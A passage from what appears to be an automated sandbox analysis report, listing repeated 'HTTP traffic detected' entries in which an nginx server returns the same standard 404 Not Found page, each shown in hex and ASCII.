to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:38:26 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:38:28 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:38:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:38:31 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:38:32 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:40:34 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:40:35 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:40:37 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 10 Jan 2024 14:40:38 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- 